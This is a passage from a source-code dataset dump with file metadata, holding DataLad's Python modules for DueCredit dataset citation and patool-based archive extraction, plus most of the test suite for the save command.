result_renderer='disabled',\n **common_kwargs):\n r['refds'] = refds_path\n yield r\n # at this point no further post-processing should be necessary,\n # `clone` and `get` must have done that (incl. parent handling)\n # if not, bugs should be fixed in those commands\n return\n" }, { "alpha_fraction": 0.6307373046875, "alphanum_fraction": 0.6328141093254089, "avg_line_length": 38.79338836669922, "blob_id": "5dd87f1c9b6d2923f1120081012998e2c05c2245", "content_id": "a9d8cb5c6c65e68b5e9e8c5fff4668040bb80340", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4815, "license_type": "permissive", "max_line_length": 92, "num_lines": 121, "path": "/datalad/support/due_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nSupport functionality for using DueCredit\n\"\"\"\n\n# Note Text was added/exposed only since DueCredit 0.6.5\nfrom .due import due, Doi, Text\nfrom ..utils import never_fail, swallow_logs\nfrom datalad.support.exceptions import CapturedException\n\nimport logging\nlgr = logging.getLogger('datalad.duecredit')\n\n\n# Ad-hoc list of candidate metadata fields and corresponding\n# DueCredit entries. First hit will win it all.\n# In the future (TODO) extractors should provide API to provide\n# reference(s). Order of extractors from config should be preserved\n# and define precedence.\n# Citation Field(s), Description Field(s), Version Field(s), DueCredit Entry.\nCITATION_CANDIDATES = [\n ('bids.DatasetDOI', 'bids.name', None, Doi), # our best guess I guess\n ('bids.HowToAcknowledge', 'bids.name', None, Text),\n # ('bids.citation', Text), # non-standard!\n # ('bids.ReferencesAndLinks', list) # freeform but we could detect\n # # URLs, DOIs, and for the rest use Text\n # CRCNS style datacite\n ('datacite.sameas', ('datacite.shortdescription', 'datacite.description'),\n 'datacite.version', Doi),\n # ('frictionless_datapackage.?' # ?\n # ('frictionless_datapackage.homepage' # ?\n (None, None, None, None) # Catch all so we leave no one behind\n]\n\n\n# Not worth being a @datasetmethod at least in this shape.\n# Could in principle provide rendering of the citation(s) etc\n# using duecredit\n@never_fail # For paranoid Yarik\ndef duecredit_dataset(dataset):\n \"\"\"Duecredit cite a dataset if Duecredit is active\n\n ATM it is an ad-hoc implementation which largely just supports\n extraction of citation information from BIDS extractor\n (datalad-neuroimaging extension) only ATM.\n Generic implementation would require minor harmonization and/or\n support of extraction of relevant information by each extractor.\n \"\"\"\n\n try:\n # probably with metalad RFing we would gain better control\n # over reporting of warnings etc, ATM the warnings are produced\n # directly within get_ds_aggregate_db_locations down below and\n # we have no other way but pacify all of them.\n with swallow_logs(logging.ERROR) as cml:\n res = dataset.metadata(\n reporton='datasets', # Interested only in the dataset record\n result_renderer='disabled', # No need\n return_type='item-or-list' # Expecting a single record\n )\n except Exception as exc:\n lgr.debug(\n \"Failed to obtain metadata for %s. Will not provide duecredit entry: %s\",\n dataset, CapturedException(exc)\n )\n return\n\n if not isinstance(res, dict):\n lgr.debug(\"Got record which is not a dict, no duecredit for now\")\n return\n \n metadata = res.get('metadata', {})\n\n # Descend following the dots -- isn't there a helper already - TODO?\n def get_field(struct, field):\n if isinstance(field, (tuple, list)):\n first = lambda values: (el for el in values if el)\n return next(first(get_field(struct, f) for f in field), None)\n if not field:\n return None\n # I think it is better to be case insensitive\n field = field.lower()\n value = struct\n for subfield in field.split('.'):\n # lower case all the keys\n value = {k.lower(): v for k, v in value.items()}\n value = value.get(subfield, None)\n if not value:\n return None\n return value\n\n for cite_field, desc_field, version_field, cite_type in CITATION_CANDIDATES:\n cite_rec = get_field(metadata, cite_field)\n if cite_field is not None:\n if not cite_rec:\n continue\n # we found it! ;)\n else:\n # Catch all\n cite_rec = \"DataLad dataset at %s\" % dataset.path\n\n desc = get_field(metadata, desc_field) if desc_field else None\n desc = desc or \"DataLad dataset %s\" % dataset.id\n\n # DueCredit's path defines grouping of entries, so with\n # \"datalad.\" we bring them all under datalad's roof!\n # And as for unique suffix, there is no better one but the ID,\n # but that one is too long so let's take the first part of UUID\n path = \"datalad:%s\" % (dataset.id.split('-', 1)[0])\n\n version = get_field(metadata, version_field) if version_field else None\n version = version or dataset.repo.describe()\n\n due.cite(\n (cite_type or Text)(cite_rec),\n path=path,\n version=version,\n description=desc\n )\n return # we are done. TODO: should we continue? ;)\n" }, { "alpha_fraction": 0.5887107253074646, "alphanum_fraction": 0.5940108895301819, "avg_line_length": 34.43192672729492, "blob_id": "537f996602d7f9c3160e5f57ead4911bef80fc6c", "content_id": "32d4738083a7d11e3d3fd63a1e35ec7d7278b57a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7547, "license_type": "permissive", "max_line_length": 90, "num_lines": 213, "path": "/datalad/support/archive_utils_patool.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"patool based implementation for datalad.support.archives utilities\"\"\"\n\nimport patoolib\nfrom .external_versions import external_versions\n# There were issues, so let's stay consistently with recent version\nassert(external_versions[\"patoolib\"] >= \"1.7\")\n\nimport os\nfrom .exceptions import MissingExternalDependency\nfrom .path import (\n basename,\n join as opj,\n)\n\nfrom datalad.utils import (\n ensure_bytes,\n chpwd,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.support.archive_utils_patool')\n\n# Monkey-patch patoolib's logging, so it logs coherently with the rest of\n# datalad\nimport patoolib.util\n#\n# Seems have managed with swallow_outputs\n#\n# def _patool_log(level, msg):\n# lgr.log(level, \"patool: %s\", msg)\n#\n# def _patool_log_info(msg, *args, **kwargs):\n# _patool_log(logging.DEBUG, msg)\n#\n# def _patool_log_error(msg, *args, **kwargs):\n# _patool_log(logging.ERROR, msg)\n#\n# patoolib.util.log_info = _patool_log_info\n# patoolib.util.log_error = _patool_log_error\n# patoolib.util.log_internal_error = _patool_log_error\n\n# we need to decorate patool.util.run\n# because otherwise it just lets processes to spit out everything to std and we\n# do want to use it at \"verbosity>=0\" so we could get idea on what is going on.\n# And I don't want to mock for every invocation\nfrom ..support.exceptions import CommandError\nfrom ..utils import swallow_outputs\nfrom datalad.cmd import (\n WitlessRunner,\n StdOutErrCapture,\n)\nfrom ..utils import ensure_unicode\n\nfrom ..utils import on_windows\n\n_runner = WitlessRunner()\n\n\ndef _patool_run(cmd, verbosity=0, **kwargs):\n \"\"\"Decorated runner for patool so it doesn't spit out outputs to stdout\"\"\"\n # use our runner\n try:\n # kwargs_ = kwargs[:]; kwargs_['shell'] = True\n # Any debug/progress output could be spit out to stderr so let's\n # \"expect\" it.\n #\n if isinstance(cmd, (list, tuple)) and kwargs.pop('shell', None):\n # patool (as far as I see it) takes care about quoting args\n cmd = ' '.join(cmd)\n out = _runner.run(\n cmd,\n protocol=StdOutErrCapture,\n **kwargs)\n lgr.debug(\"Finished running for patool. stdout=%s, stderr=%s\",\n out['stdout'], out['stderr'])\n return 0\n except CommandError as e:\n return e.code\n except Exception as e:\n lgr.error(\"While invoking runner caught unexpected exception: %s\", e)\n return 100 # unknown beast\npatoolib.util.run = _patool_run\n\n\n# yoh: only keys are used atm, logic in decompress_file is replaced to use\n# patool\n\nDECOMPRESSORS = {\n r'\\.(tar\\.bz|tbz)$': 'tar -xjvf %(file)s -C %(dir)s',\n r'\\.(tar\\.xz)$': 'tar -xJvf %(file)s -C %(dir)s',\n r'\\.(tar\\.gz|tgz)$': 'tar -xzvf %(file)s -C %(dir)s',\n r'\\.(zip)$': 'unzip %(file)s -d %(dir)s',\n}\n\n\ndef unixify_path(path):\n r\"\"\"On windows convert paths from drive:\\d\\file to /drive/d/file\n\n This overcomes problems with various cmdline tools we are to use,\n such as tar etc\n \"\"\"\n if on_windows:\n drive, path_ = os.path.splitdrive(path)\n path_ = path_.split(os.sep)\n path_ = '/'.join(path_)\n if drive:\n # last one must be :\n assert(drive[-1] == \":\")\n return '/%s%s' % (drive[:-1], path_)\n else:\n return path_\n else:\n return path\n\n\ndef decompress_file(archive, dir_):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n Parameters\n ----------\n archive: str\n dir_: str\n \"\"\"\n with swallow_outputs() as cmo:\n archive = ensure_bytes(archive)\n dir_ = ensure_bytes(dir_)\n patoolib.util.check_existing_filename(archive)\n patoolib.util.check_existing_filename(dir_, onlyfiles=False)\n # Call protected one to avoid the checks on existence on unixified path\n outdir = unixify_path(dir_)\n # should be supplied in PY3 to avoid b''\n outdir = ensure_unicode(outdir)\n archive = ensure_unicode(archive)\n\n format_compression = patoolib.get_archive_format(archive)\n if format_compression == ('gzip', None):\n # Yarik fell into the trap of being lazy and not providing proper\n # support for .gz .xz etc \"stream archivers\" formats in handling\n # of archives. ATM out support for .gz relies on behavior of 7z while\n # extracting them and respecting possibly present .gz filename\n # header field.\n # See more https://github.com/datalad/datalad/pull/3176#issuecomment-466819861\n # TODO: provide proper handling of all those archives without\n # relying on any filename been stored in the header\n program = patoolib.find_archive_program(\n format_compression[0], 'extract')\n if basename(program) != '7z':\n raise MissingExternalDependency(\n \"cmd:7z\",\n msg=\"(Not) Funny enough but ATM we need p7zip installation \"\n \"to handle .gz files extraction 'correctly'\"\n )\n\n patoolib._extract_archive(unixify_path(archive),\n outdir=outdir,\n verbosity=100)\n if cmo.out:\n lgr.debug(\"patool gave stdout:\\n%s\", cmo.out)\n if cmo.err:\n lgr.debug(\"patool gave stderr:\\n%s\", cmo.err)\n\n # Note: (ben) Experienced issue, where extracted tarball\n # lacked execution bit of directories, leading to not being\n # able to delete them while having write permission.\n # Can't imagine a situation, where we would want to fail on\n # that kind of mess. So, to be sure set it.\n\n if not on_windows:\n os.chmod(dir_,\n os.stat(dir_).st_mode |\n os.path.stat.S_IEXEC)\n for root, dirs, files in os.walk(dir_, followlinks=False):\n for d in dirs:\n subdir = opj(root, d)\n os.chmod(subdir,\n os.stat(subdir).st_mode |\n os.path.stat.S_IEXEC)\n\n\ndef compress_files(files, archive, path=None, overwrite=True):\n \"\"\"Compress `files` into an `archive` file\n\n Parameters\n ----------\n files : list of str\n archive : str\n path : str\n Alternative directory under which compressor will be invoked, to e.g.\n take into account relative paths of files and/or archive\n overwrite : bool\n Whether to allow overwriting the target archive file if one already exists\n \"\"\"\n with swallow_outputs() as cmo:\n with chpwd(path):\n if not overwrite:\n patoolib.util.check_new_filename(archive)\n patoolib.util.check_archive_filelist(files)\n # Call protected one to avoid the checks on existence on unixified path\n patoolib._create_archive(unixify_path(archive),\n [unixify_path(f) for f in files],\n verbosity=100)\n if cmo.out:\n lgr.debug(\"patool gave stdout:\\n%s\", cmo.out)\n if cmo.err:\n lgr.debug(\"patool gave stderr:\\n%s\", cmo.err)\n" }, { "alpha_fraction": 0.6181303858757019, "alphanum_fraction": 0.6250792145729065, "avg_line_length": 34.97719192504883, "blob_id": "9ddb39b604f5eda5ce916597c151169f84036e4c", "content_id": "ab1668ac445e34be598829318aab5a74aba5abdc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41014, "license_type": "permissive", "max_line_length": 216, "num_lines": 1140, "path": "/datalad/core/local/tests/test_save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test save command\"\"\"\n\nimport itertools\nimport logging\nimport os\nimport os.path as op\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad.api import (\n create,\n install,\n save,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n known_failure,\n known_failure_windows,\n maybe_adjust_repo,\n neq_,\n ok_,\n patch,\n skip_if_adjusted_branch,\n skip_wo_symlink_capability,\n swallow_logs,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n ensure_list,\n rmtree,\n)\n\ntree_arg = dict(tree={'test.txt': 'some',\n 'test_annex.txt': 'some annex',\n 'test1.dat': 'test file 1',\n 'test2.dat': 'test file 2',\n OBSCURE_FILENAME: 'blobert',\n 'dir': {'testindir': 'someother',\n OBSCURE_FILENAME: 'none'},\n 'dir2': {'testindir3': 'someother3'}})\n\n\n@with_tempfile()\ndef test_save(path=None):\n\n ds = Dataset(path).create(annex=False)\n\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"something\")\n\n ds.repo.add(\"new_file.tst\", git=True)\n ok_(ds.repo.dirty)\n\n ds.save(message=\"add a new file\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"modify\")\n\n ok_(ds.repo.dirty)\n ds.save(message=\"modified new_file.tst\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # save works without ds and files given in the PWD\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"rapunzel\")\n with chpwd(path):\n save(message=\"love rapunzel\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # and also without `-a` when things are staged\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"exotic\")\n ds.repo.add(\"new_file.tst\", git=True)\n with chpwd(path):\n save(message=\"love marsians\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n files = ['one.txt', 'two.txt']\n for fn in files:\n with open(op.join(path, fn), \"w\") as f:\n f.write(fn)\n\n ds.save([op.join(path, f) for f in files])\n # superfluous call to save (alll saved it already), should not fail\n # but report that nothing was saved\n assert_status('notneeded', ds.save(message=\"set of new files\"))\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # create subdataset\n subds = ds.create('subds')\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n # modify subds\n with open(op.join(subds.path, \"some_file.tst\"), \"w\") as f:\n f.write(\"something\")\n subds.save()\n assert_repo_status(subds.path, annex=isinstance(subds.repo, AnnexRepo))\n # ensure modified subds is committed\n ds.save()\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # now introduce a change downstairs\n subds.create('someotherds')\n assert_repo_status(subds.path, annex=isinstance(subds.repo, AnnexRepo))\n ok_(ds.repo.dirty)\n # and save via subdataset path\n ds.save('subds', version_tag='new_sub')\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n tags = ds.repo.get_tags()\n ok_(len(tags) == 1)\n eq_(tags[0], dict(hexsha=ds.repo.get_hexsha(), name='new_sub'))\n # fails when retagged, like git does\n res = ds.save(version_tag='new_sub', on_failure='ignore')\n assert_status('error', res)\n assert_result_count(\n res, 1,\n action='save', type='dataset', path=ds.path,\n message=('cannot tag this version: %s',\n \"fatal: tag 'new_sub' already exists\"))\n\n\n@with_tempfile()\ndef test_save_message_file(path=None):\n ds = Dataset(path).create()\n with assert_raises(ValueError):\n ds.save(\"blah\", message=\"me\", message_file=\"and me\")\n\n create_tree(path, {\"foo\": \"x\",\n \"msg\": \"add foo\"})\n ds.repo.add(\"foo\")\n ds.save(message_file=op.join(ds.path, \"msg\"))\n # ATTN: Consider corresponding branch so that this check works when we're\n # on an adjusted branch too (e.g., when this test is executed under\n # Windows).\n eq_(ds.repo.format_commit(\"%s\", DEFAULT_BRANCH),\n \"add foo\")\n\n\n@with_tempfile()\ndef check_renamed_file(recursive, annex, path):\n ds = Dataset(path).create(annex=annex)\n create_tree(path, {'old': ''})\n ds.repo.add('old')\n ds.repo.call_git([\"mv\"], files=[\"old\", \"new\"])\n ds.save(recursive=recursive)\n assert_repo_status(path)\n\n # https://github.com/datalad/datalad/issues/6558\n new = (ds.pathobj / \"new\")\n new.unlink()\n new.mkdir()\n (new / \"file\").touch()\n ds.repo.call_git([\"add\"], files=[str(new / \"file\")])\n ds.save(recursive=recursive)\n assert_repo_status(path)\n\n\[email protected](\n \"recursive,annex\",\n itertools.product(\n (False, ), #, True TODO when implemented\n (True, False),\n )\n)\ndef test_renamed_file(recursive, annex):\n check_renamed_file(recursive, annex)\n\n\n@with_tempfile(mkdir=True)\ndef test_subdataset_save(path=None):\n parent = Dataset(path).create()\n sub = parent.create('sub')\n assert_repo_status(parent.path)\n create_tree(parent.path, {\n \"untracked\": 'ignore',\n 'sub': {\n \"new\": \"wanted\"}})\n sub.save('new')\n # defined state: one untracked, modified (but clean in itself) subdataset\n assert_repo_status(sub.path)\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n\n # `save sub` does not save the parent!!\n with chpwd(parent.path):\n assert_status('notneeded', save(dataset=sub.path))\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n # `save -u .` saves the state change in the subdataset,\n # but leaves any untracked content alone\n with chpwd(parent.path):\n assert_status('ok', parent.save(updated=True))\n assert_repo_status(parent.path, untracked=['untracked'])\n\n # get back to the original modified state and check that -S behaves in\n # exactly the same way\n create_tree(parent.path, {\n 'sub': {\n \"new2\": \"wanted2\"}})\n sub.save('new2')\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n\n # https://github.com/datalad/datalad/issues/6843\n # saving subds within super must not add 2nd copy of the submodule within .gitmodules\n with chpwd(sub.path):\n # op.sep is critical to trigger saving within (although should not\n # be relevant sice no changes within sub)\n res = save(dataset=\"^\", path=sub.path + op.sep)\n assert_repo_status(parent.path, untracked=['untracked'])\n git_modules = (parent.pathobj / \".gitmodules\")\n # there was nothing to do for .gitmodules\n # TODO: enable assert_result_count(res, 0, path=str(git_modules))\n # more thorough test that it also was not modified.\n # ensure that .gitmodules does not have duplicate entries\n submodules = [\n l.strip()\n for l in git_modules.read_text().splitlines()\n if l.strip().split(' ', 1)[0] == '[submodule'\n ]\n assert len(submodules) == 1\n\n\n@with_tempfile(mkdir=True)\ndef test_subsuperdataset_save(path=None):\n # Verify that when invoked without recursion save does not\n # cause querying of subdatasets of the subdataset\n # see https://github.com/datalad/datalad/issues/4523\n parent = Dataset(path).create()\n # Create 3 levels of subdatasets so later to check operation\n # with or without --dataset being specified\n sub1 = parent.create('sub1')\n sub2 = parent.create(sub1.pathobj / 'sub2')\n sub3 = parent.create(sub2.pathobj / 'sub3')\n assert_repo_status(path)\n # now we will lobotomize that sub3 so git would fail if any query is performed.\n (sub3.pathobj / '.git' / 'config').chmod(0o000)\n try:\n sub3.repo.call_git(['ls-files'], read_only=True)\n raise SkipTest\n except CommandError:\n # desired outcome\n pass\n # the call should proceed fine since neither should care about sub3\n # default is no recursion\n parent.save('sub1')\n sub1.save('sub2')\n assert_raises(CommandError, parent.save, 'sub1', recursive=True)\n # and should not fail in the top level superdataset\n with chpwd(parent.path):\n save('sub1')\n # or in a subdataset above the problematic one\n with chpwd(sub1.path):\n save('sub2')\n\n\n@skip_wo_symlink_capability\n@with_tempfile(mkdir=True)\ndef test_symlinked_relpath(path=None):\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n os.makedirs(op.join(path, \"origin\"))\n dspath = op.join(path, \"linked\")\n os.symlink('origin', dspath)\n ds = Dataset(dspath).create()\n create_tree(dspath, {\n \"mike1\": 'mike1', # will be added from topdir\n \"later\": \"later\", # later from within subdir\n \"d\": {\n \"mike2\": 'mike2', # to be added within subdir\n }\n })\n\n # in the root of ds\n with chpwd(dspath):\n ds.repo.add(\"mike1\", git=True)\n ds.save(message=\"committing\", path=\"./mike1\")\n\n # Let's also do in subdirectory as CWD, check that relative path\n # given to a plain command (not dataset method) are treated as\n # relative to CWD\n with chpwd(op.join(dspath, 'd')):\n save(dataset=ds.path,\n message=\"committing\",\n path=\"mike2\")\n\n later = op.join(op.pardir, \"later\")\n ds.repo.add(later, git=True)\n save(dataset=ds.path, message=\"committing\", path=later)\n\n assert_repo_status(dspath)\n\n\n@skip_wo_symlink_capability\n@with_tempfile(mkdir=True)\ndef test_bf1886(path=None):\n parent = Dataset(path).create()\n parent.create('sub')\n assert_repo_status(parent.path)\n # create a symlink pointing down to the subdataset, and add it\n os.symlink('sub', op.join(parent.path, 'down'))\n parent.save('down')\n assert_repo_status(parent.path)\n # now symlink pointing up\n os.makedirs(op.join(parent.path, 'subdir', 'subsubdir'))\n os.symlink(op.join(op.pardir, 'sub'), op.join(parent.path, 'subdir', 'up'))\n parent.save(op.join('subdir', 'up'))\n # 'all' to avoid the empty dir being listed\n assert_repo_status(parent.path, untracked_mode='all')\n # now symlink pointing 2xup, as in #1886\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup'))\n parent.save(op.join('subdir', 'subsubdir', 'upup'))\n assert_repo_status(parent.path)\n # simultaneously add a subds and a symlink pointing to it\n # create subds, but don't register it\n create(op.join(parent.path, 'sub2'))\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub2'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup2'))\n parent.save(['sub2', op.join('subdir', 'subsubdir', 'upup2')])\n assert_repo_status(parent.path)\n # full replication of #1886: the above but be in subdir of symlink\n # with no reference dataset\n create(op.join(parent.path, 'sub3'))\n os.symlink(\n op.join(op.pardir, op.pardir, 'sub3'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup3'))\n # need to use absolute paths\n with chpwd(op.join(parent.path, 'subdir', 'subsubdir')):\n save([op.join(parent.path, 'sub3'),\n op.join(parent.path, 'subdir', 'subsubdir', 'upup3')])\n assert_repo_status(parent.path)\n\n\n@with_tree({\n '1': '',\n '2': '',\n '3': ''})\ndef test_gh2043p1(path=None):\n # this tests documents the interim agreement on what should happen\n # in the case documented in gh-2043\n ds = Dataset(path).create(force=True)\n ds.save('1')\n assert_repo_status(ds.path, untracked=['2', '3'])\n ds.unlock('1')\n assert_repo_status(\n ds.path,\n # on windows we are in an unlocked branch by default, hence\n # we would see no change\n modified=[] if ds.repo.is_managed_branch() else ['1'],\n untracked=['2', '3'])\n # save(.) should recommit unlocked file, and not touch anything else\n # this tests the second issue in #2043\n with chpwd(path):\n # only save modified bits\n save(path='.', updated=True)\n # state of the file (unlocked/locked) is committed as well, and the\n # test doesn't lock the file again\n assert_repo_status(ds.path, untracked=['2', '3'])\n with chpwd(path):\n # but when a path is given, anything that matches this path\n # untracked or not is added/saved\n save(path='.')\n # state of the file (unlocked/locked) is committed as well, and the\n # test doesn't lock the file again\n assert_repo_status(ds.path)\n\n\n@with_tree({\n 'staged': 'staged',\n 'untracked': 'untracked'})\ndef test_bf2043p2(path=None):\n ds = Dataset(path).create(force=True)\n ds.repo.add('staged')\n assert_repo_status(ds.path, added=['staged'], untracked=['untracked'])\n # save -u does not commit untracked content\n # this tests the second issue in #2043\n with chpwd(path):\n save(updated=True)\n assert_repo_status(ds.path, untracked=['untracked'])\n\n\n@with_tree({\n OBSCURE_FILENAME + u'_staged': 'staged',\n OBSCURE_FILENAME + u'_untracked': 'untracked'})\ndef test_encoding(path=None):\n staged = OBSCURE_FILENAME + u'_staged'\n untracked = OBSCURE_FILENAME + u'_untracked'\n ds = Dataset(path).create(force=True)\n ds.repo.add(staged)\n assert_repo_status(ds.path, added=[staged], untracked=[untracked])\n ds.save(updated=True)\n assert_repo_status(ds.path, untracked=[untracked])\n\n\n@with_tree(**tree_arg)\ndef test_add_files(path=None):\n ds = Dataset(path).create(force=True)\n\n test_list_1 = ['test_annex.txt']\n test_list_2 = ['test.txt']\n test_list_3 = ['test1.dat', 'test2.dat']\n test_list_4 = [op.join('dir', 'testindir'),\n op.join('dir', OBSCURE_FILENAME)]\n\n for arg in [(test_list_1[0], False),\n (test_list_2[0], True),\n (test_list_3, False),\n (test_list_4, False)]:\n # special case 4: give the dir:\n if arg[0] == test_list_4:\n result = ds.save('dir', to_git=arg[1])\n status = ds.repo.get_content_annexinfo(['dir'])\n else:\n result = ds.save(arg[0], to_git=arg[1])\n for a in ensure_list(arg[0]):\n assert_result_count(result, 1, path=str(ds.pathobj / a))\n status = ds.repo.get_content_annexinfo(\n ut.Path(p) for p in ensure_list(arg[0]))\n for f, p in status.items():\n if arg[1]:\n assert p.get('key', None) is None, f\n else:\n assert p.get('key', None) is not None, f\n\n\n@with_tree(**tree_arg)\n@with_tempfile(mkdir=True)\ndef test_add_subdataset(path=None, other=None):\n subds = create(op.join(path, 'dir'), force=True)\n ds = create(path, force=True)\n ok_(subds.repo.dirty)\n ok_(ds.repo.dirty)\n assert_not_in('dir', ds.subdatasets(result_xfm='relpaths'))\n # \"add everything in subds to subds\"\n save(dataset=subds.path)\n assert_repo_status(subds.path)\n assert_not_in('dir', ds.subdatasets(result_xfm='relpaths'))\n # but with a base directory we add the dataset subds as a subdataset\n # to ds\n res = ds.save(subds.path)\n assert_in_results(res, action=\"add\", path=subds.path, refds=ds.path)\n res = ds.subdatasets()\n assert_result_count(res, 1)\n assert_result_count(\n res, 1,\n # essentials\n path=op.join(ds.path, 'dir'),\n gitmodule_url='./dir',\n gitmodule_name='dir',\n )\n # create another one\n other = create(other)\n # install into superdataset, but don't add\n other_clone = install(source=other.path, path=op.join(ds.path, 'other'))\n # little dance to get the revolution-type dataset\n other_clone = Dataset(other_clone.path)\n ok_(other_clone.is_installed)\n assert_not_in('other', ds.subdatasets(result_xfm='relpaths'))\n # now add, it should pick up the source URL\n ds.save('other')\n # and that is why, we can reobtain it from origin\n ds.drop('other', what='all', reckless='kill', recursive=True)\n ok_(not other_clone.is_installed())\n ds.get('other')\n ok_(other_clone.is_installed())\n\n\n# CommandError: command '['git', '-c', 'receive.autogc=0', '-c', 'gc.auto=0', 'annex', 'add', '--json', '--', 'empty', 'file.txt']' failed with exitcode 1\n# Failed to run ['git', '-c', 'receive.autogc=0', '-c', 'gc.auto=0', 'annex', 'add', '--json', '--', 'empty', 'file.txt'] under 'C:\\\\Users\\\\appveyor\\\\AppData\\\\Local\\\\Temp\\\\1\\\\datalad_temp_tree_j2mk92y3'. Exit code=1.\n@known_failure_windows\n@with_tree(tree={\n 'file.txt': 'some text',\n 'empty': '',\n 'file2.txt': 'some text to go to annex',\n '.gitattributes': '* annex.largefiles=(not(mimetype=text/*))'}\n)\ndef test_add_mimetypes(path=None):\n ds = Dataset(path).create(force=True)\n ds.repo.add('.gitattributes')\n ds.repo.commit('added attributes to git explicitly')\n # now test that those files will go into git/annex correspondingly\n # WINDOWS FAILURE NEXT\n __not_tested__ = ds.save(['file.txt', 'empty'])\n assert_repo_status(path, untracked=['file2.txt'])\n # But we should be able to force adding file to annex when desired\n ds.save('file2.txt', to_git=False)\n # check annex file status\n annexinfo = ds.repo.get_content_annexinfo()\n for path, in_annex in (\n # Empty one considered to be application/octet-stream\n # i.e. non-text\n ('empty', True),\n ('file.txt', False),\n ('file2.txt', True)):\n # low-level API report -> repo path reference, no ds path\n p = ds.repo.pathobj / path\n assert_in(p, annexinfo)\n if in_annex:\n assert_in('key', annexinfo[p], p)\n else:\n assert_not_in('key', annexinfo[p], p)\n\n\n@with_tempfile(mkdir=True)\ndef test_gh1597(path=None):\n ds = Dataset(path).create()\n sub = ds.create('sub')\n res = ds.subdatasets()\n assert_result_count(res, 1, path=sub.path)\n # now modify .gitmodules with another command\n ds.subdatasets(contains=sub.path, set_property=[('this', 'that')])\n # now modify low-level\n with open(op.join(ds.path, '.gitmodules'), 'a') as f:\n f.write('\\n')\n assert_repo_status(ds.path, modified=['.gitmodules'])\n ds.save('.gitmodules')\n # must not come under annex management\n assert_not_in(\n 'key',\n ds.repo.get_content_annexinfo(paths=['.gitmodules']).popitem()[1])\n\n\n@with_tempfile(mkdir=True)\ndef test_gh1597_simpler(path=None):\n ds = Dataset(path).create()\n # same goes for .gitattributes\n with open(op.join(ds.path, '.gitignore'), 'a') as f:\n f.write('*.swp\\n')\n ds.save('.gitignore')\n assert_repo_status(ds.path)\n # put .gitattributes in some subdir and add all, should also go into Git\n attrfile = op.join ('subdir', '.gitattributes')\n ds.repo.set_gitattributes(\n [('*', dict(mycustomthing='this'))],\n attrfile)\n assert_repo_status(ds.path, untracked=[attrfile], untracked_mode='all')\n ds.save()\n assert_repo_status(ds.path)\n # no annex key, not in annex\n assert_not_in(\n 'key',\n ds.repo.get_content_annexinfo([ut.Path(attrfile)]).popitem()[1])\n\n\n@with_tempfile(mkdir=True)\ndef test_update_known_submodule(path=None):\n def get_baseline(p):\n ds = Dataset(p).create()\n sub = create(str(ds.pathobj / 'sub'))\n assert_repo_status(ds.path, untracked=['sub'])\n return ds\n # attempt one\n ds = get_baseline(op.join(path, 'wo_ref'))\n with chpwd(ds.path):\n save(recursive=True)\n assert_repo_status(ds.path)\n\n # attempt two, same as above but call add via reference dataset\n ds = get_baseline(op.join(path, 'w_ref'))\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_add_recursive(path=None):\n # make simple hierarchy\n parent = Dataset(path).create()\n assert_repo_status(parent.path)\n sub1 